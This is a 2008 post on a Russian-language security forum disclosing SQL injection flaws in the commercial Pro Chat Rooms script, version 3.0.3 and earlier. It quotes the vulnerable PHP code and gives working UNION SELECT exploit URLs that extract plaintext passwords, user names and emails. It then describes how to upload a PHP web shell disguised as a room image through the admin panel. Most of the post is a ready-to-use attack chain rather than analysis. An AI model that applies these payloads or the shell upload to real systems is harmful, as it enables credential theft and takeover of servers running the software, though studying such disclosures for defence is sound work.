ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу Pro Chat Rooms <= 3.0.3 SQL Injection
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Pro Chat Rooms <= 3.0.3 SQL Injection
  #1  
Старый 28.09.2008, 17:23
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию Pro Chat Rooms <= 3.0.3 SQL Injection
Офф.сайт: www.prochatrooms.com
Demo: www.prochatrooms.com/demo.php
Стоймость: $55 скачать
Префикс таблиц бд: prochatrooms_
Табличка: prochatrooms_users
Клонки: user_name,password,email
Алгоритм шифрования: в открытом виде
Админка: http://localhost/admin/

[SQL Injection]

Сценарий /[installdir]/profiles/index.php

уязвимый код:

PHP код:
$tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'"); 
Отсутствует проверка переменной "gud" что позволяет нам провести SQL-Иньекцию.

Условие: magic_quotes_gpc = Off

Эксплойт:

Код:
http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
Сценарий /[installdir]/profiles/admin.php

уязвимый код:

PHP код:
$tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'"); 
Баг оналогичен предыдущему.

Условие: magic_quotes_gpc = Off

Эксплойт:

Код:
http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
[Шелл]

Заходим в админку -> создаём новую комнату (http://localhost/[installdir]/admin/index.php?action=rooms) -> Create New Room

Room name: пишем название комнаты
Password: пароль на комнату
Description: описание
Image*: заливаем наш шелл с расширением .php

Шелл будет тут:

http://localhost/[installdir]/backgrounds/shell.php


http://milw0rm.com/exploits/6612

(c) ~!DoK_tOR!~
Последний раз редактировалось ~!DoK_tOR!~; 29.09.2008 в 00:34..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ